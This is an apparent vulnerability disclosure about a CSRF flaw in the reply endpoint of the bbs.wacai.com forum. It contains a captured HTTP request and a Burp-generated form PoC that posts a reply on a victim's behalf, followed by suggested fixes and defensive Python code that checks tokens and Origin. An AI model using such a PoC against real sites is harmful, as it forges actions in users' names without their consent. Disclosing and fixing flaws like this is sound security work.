@1kbfree
2018-09-13T22:49:50.000000Z
Vulnerability discovery
1. Open the URL: https://bbs.wacai.com/web/thread/9666092
2. Click "Reply" and capture the traffic; the captured request is as follows:
POST /web/api/reply/add HTTP/1.1
Host: bbs.wacai.com
Connection: close
Content-Length: 50
Accept: application/json, text/javascript
Origin: https://bbs.wacai.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://bbs.wacai.com/web/thread/9666092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 马赛克
tid=9666092&message=%3Cdiv%3Ecsrf_test%3C%2Fdiv%3E
3. There is no anti-CSRF token, and the Referer is not checked either, so the request can be turned directly into a PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://bbs.wacai.com/web/api/reply/add" method="POST">
<input type="hidden" name="tid" value="9666092" />
<input type="hidden" name="message" value="<div>csrf_test</div>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Open the PoC in the browser.
OK, the reply is posted successfully.
Suggested fixes:
1. Add token verification
2. Add a captcha
3. Restrict the Referer
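As an added example (not code from the original report or from the site), a server-side gate for this reply endpoint that implements fixes 1 and 3 together: a per-session synchronizer token that the reply form echoes back in a hidden field, compared in constant time, plus a same-origin check on the Origin header with Referer as the fallback. The field name csrf_token, the session dict and the function names are assumptions; the allowed origin is the forum host from the captured request.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# The forum's own origin, taken from the captured request in the report.
ALLOWED_ORIGIN = "https://bbs.wacai.com"


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) a per-session synchronizer token. The reply form
    must send it back in a hidden field; a cross-site form cannot read it."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _source_allowed(headers: dict) -> bool:
    """Fix 3: accept only same-origin sources. Browsers send Origin on
    cross-site form POSTs, so it is checked first; Referer is the fallback;
    a request carrying neither header is rejected rather than trusted."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == ALLOWED_ORIGIN
    referer = headers.get("Referer")
    if referer is None:
        return False
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def reply_add_allowed(headers: dict, body: str, session: dict) -> bool:
    """Decide whether a POST /web/api/reply/add may be processed (assumed
    handler hook). Both the source check and the token check must pass."""
    if not _source_allowed(headers):
        return False
    form = parse_qs(body, keep_blank_values=True)
    submitted = form.get("csrf_token", [""])[0]
    expected = session.get("csrf_token", "")
    if not expected or not submitted:
        return False
    # Fix 1: constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(submitted, expected)
```

With this gate in place, the body captured in step 2 is rejected because it carries no token, and the PoC form is rejected because its Origin is not the forum's.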